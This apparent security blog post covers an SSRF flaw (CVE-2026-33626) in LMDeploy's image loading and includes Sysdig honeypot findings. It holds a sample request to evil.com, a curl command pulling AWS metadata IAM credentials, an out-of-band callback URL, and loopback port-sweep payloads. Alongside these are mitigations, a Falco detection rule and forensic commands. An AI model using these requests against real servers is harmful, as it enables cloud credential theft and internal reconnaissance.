Listen to this Post

Introduction
The integration of vision-language models into production workflows has introduced a dangerous Server-Side Request Forgery (SSRF) vulnerability in LMDeploy, a popular LLM inference toolkit. Tracked as CVE-2026-33626 (CVSS 7.5), this flaw allows unauthenticated attackers to abuse the `load_image()` function to forge arbitrary HTTP requests from the server, leading to cloud credential theft, internal network scanning, and lateral movement. The weaponization window has collapsed from weeks to hours: Sysdig observed the first live exploitation just 12 hours and 31 minutes after the GitHub Security Advisory was published, with the attacker conducting a multi-stage internal reconnaissance campaign using only the advisory text as their blueprint.
Learning Objectives
- Understand the SSRF mechanism: Analyze the vulnerable `load_image()` code in LMDeploy and its exploitation chain.
- Master attacker TTPs: Reconstruct the three-phase attack sequence, including IMDS credential harvesting, internal port scanning, and OOB DNS exfiltration.
- Learn defense-in-depth: Apply best-practice mitigations, including network egress controls, metadata service hardening, and runtime detection.
You Should Know
1. Anatomy of the LMDeploy SSRF Vulnerability
The attack surface lies in LMDeploy’s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches a user-supplied URL without any validation of internal or private IP addresses, allowing any external actor to instruct the inference server to make arbitrary web requests. Below is the standard OpenAI-compatible request shape that triggers this behavior:
{
"model": "internlm-xcomposer2",
"messages": [{
"role": "user",
"content": [
{"type": "text", "text": "Analyze this image"},
{"type": "image_url", "image_url": {"url": "http://evil.com/exploit"}}
]
}]
}
Step-by-step guide to testing for the vulnerability (ethical use only):
1. Identify a LMDeploy inference server endpoint (default port 8000).
2. Send a POST request to `/v1/chat/completions` with a malicious `image_url` targeting an internal resource, e.g. `http://169.254.169.254/latest/meta-data/`.
3. If the server responds with the cloud metadata or an error confirming the request was processed, the server is vulnerable.
4. Use `curl` to automate the test:
curl -X POST http://target.com:8000/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "internlm-xcomposer2",
"messages": [{"role": "user", "content": [
{"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}}
]}]
}'
2. The Three-Phase Attack Campaign (Sysdig Honeypot Analysis)
Sysdig captured a real adversary conducting a systematic internal reconnaissance session lasting only eight minutes. The attack originated from IP `103.116.72[.]119` and followed a structured methodology:
Phase 1 – Cloud metadata and internal service probing (03:35:22 UTC):
The attacker first targeted the AWS Instance Metadata Service (IMDS) using the payload http://169.254.169.254/latest/meta-data/iam/security-credentials/` in an attempt to steal IAM role credentials. They then pivoted to probe the loopback Redis port (127.0.0.1:6379) and MySQL port (127.0.0.1:3306`) to identify in-cluster data stores.
Phase 2 – Out-of-band (OOB) callback and API enumeration (03:41:07 UTC):
To confirm that the SSRF primitive could reach arbitrary external hosts, the attacker used an OAST DNS callback to http://cw2mhnbd.requestrepo.com`. Immediately after, they enumerated the API surface by requesting:
GET / GET /openapi.json POST /v1/chat/completions
The `/openapi.json` endpoint exposed internal administrative APIs, including those under/distserve/`, which the adversary then probed.
Phase 3 – Administrative disruption and loopback port sweep (03:42:35 UTC):
The attacker sent a POST request to `/distserve/p2p_drop_connect` to tear down the ZMQ link between prefill and decode engines, degrading inference availability. Finally, they performed a scripted loopback port sweep:
{"image_url": "http://127.0.0.1:6379"}
{"image_url": "http://127.0.0.1:3306"}
{"image_url": "http://127.0.0.1:8080"}
This 36-second scan confirmed internal services reachable via the vulnerable inference engine.
3. Defensive Mitigations: Hardening Your AI Infrastructure
The collapse of the patch-to-exploit window to less than 13 hours demands immediate, layered defenses. Perform the following actions in order:
Step 1: Upgrade LMDeploy instantly
Update to version v0.12.3 or later. This patch introduces the `_is_safe_url()` function that blocks all internal IP ranges and link-local addresses.
pip install --upgrade lmdeploy>=0.12.3
If an immediate upgrade is impossible, front the inference API with a reverse proxy that strips or rewrites the `image_url` field, or disable vision-model endpoints entirely.
Step 2: Enforce IMDSv2 on all inference nodes
An SSRF primitive using only `requests.get()` cannot generate the required PUT session token for IMDSv2, effectively blocking this attack vector. For AWS, set:
aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required --http-put-response-hop-limit 1
Step 3: Restrict network egress at the VPC/security group level
Inference nodes should only be allowed to reach model-artifact storage (e.g., S3, GCS) and essential logging endpoints. Block all traffic to RFC 1918, link-local, and loopback addresses. Example AWS security group rule:
Outbound: Deny all to 169.254.0.0/16, 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16
Step 4: Implement runtime detection with Falco rules
Use Falco to monitor outbound connections from inference processes. Sysdig recommends enabling rules that fire on connections to cloud metadata services, regardless of the framework. Example Falco rule snippet:
- rule: Contact EC2 Instance Metadata Service From Container condition: outbound and fd.sip="169.254.169.254" and container output: "SSRF attempt: container %container.id contacts IMDS" priority: CRITICAL
Step 5: Rotate credentials and audit internal services
Any IAM role credentials attached to pre-v0.12.3 LMDeploy deployments must be considered compromised and rotated immediately. Additionally, ensure that Redis, MySQL, and administrative interfaces are bound only to private interfaces and require strong authentication.
4. Windows and Linux Commands for Forensic Investigation
If you suspect an LMDeploy server has been exploited, use the following commands to sweep for indicators:
Linux – Check for unexpected connections to IMDS or loopback:
Check live connections to IMDS sudo ss -tnp | grep 169.254.169.254 Search for image_url patterns in API access logs grep -r "image_url.169.254" /var/log/lmdeploy/ Audit recent DNS lookups to known OOB endpoints journalctl -u lmdeploy | grep -i "requestrepo"
Windows – Use PowerShell to check for indicators:
Check for connections to internal IP ranges
Get-NetTCPConnection | Where-Object {$_.RemoteAddress -match "^(127.|10.|172.1[6-9]|172.2[0-9]|172.3[0-1]|192.168.)"}
Search IIS logs for SSRF payloads
Select-String -Path "C:\inetpub\logs\LogFiles.log" -Pattern "image_url.http://169.254.169.254"
5. Proactive Security: Hardening Kubernetes Deployments
Given that LMDeploy is often deployed in Kubernetes clusters, implement network policies to enforce egress restrictions. Below is an example `NetworkPolicy` that prevents pods from accessing metadata services and internal ranges:
apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: lmdeploy-egress-hardening spec: podSelector: matchLabels: app: lmdeploy policyTypes: - Egress egress: - to: - ipBlock: cidr: 0.0.0.0/0 except: - 169.254.0.0/16 - 127.0.0.0/8 - 10.0.0.0/8 - 172.16.0.0/12 - 192.168.0.0/16 ports: - port: 443 protocol: TCP - port: 80 protocol: TCP
What Undercode Say
- Key Takeaway 1: The LLM inference supply chain is now a prime target for adversaries; the exploit gap has collapsed from weeks to less than 13 hours.
- Key Takeaway 2: Traditional patch management cycles are obsolete for AI infrastructure; defense-in-depth (IMDSv2 + egress filtering + runtime detection) is the only viable strategy.
- Analysis: CVE-2026-33626 represents a paradigm shift: threat actors are now building exploits directly from security advisories using generative AI, eliminating the need for public PoC code. The fact that Sysdig observed exploitation within 12 hours and 31 minutes, despite LMDeploy having only ~7,800 GitHub stars, proves that niche ML tooling is not safe from rapid, automated attacks.
Generative AI accelerates this collapse—advisories that include the affected file, parameter name, and missing sanitization become input prompts for attack generation. Defenders must assume that every inference server, agent framework, or vision API that fetches URLs is vulnerable by default unless explicitly hardened. The iron triangle of speed, automation, and reachability has now shifted entirely to the attacker’s advantage.
Prediction
The exploitation of CVE-2026-33626 is not an isolated incident but the beginning of a broader trend: hyper-fast weaponization of AI infrastructure disclosures. In the coming 12 months, expect an order-of-magnitude increase in automated exploit generation from security advisories, driven by LLMs and agentic workflows.
We predict the emergence of “advisory-first exploit frameworks”—autonomous systems that monitor GHSA and NVD feeds, extract vulnerable code patterns, and generate working exploits in minutes. The AI infrastructure threat landscape will bifurcate: organizations that implement proactive egress control and metadata service hardening will survive; those relying solely on patch management will face repeated, automated breaches. The clock on AI security has fundamentally reset—and defenders are already behind.
▶️ Related Video (68% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Igor Stepansky – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


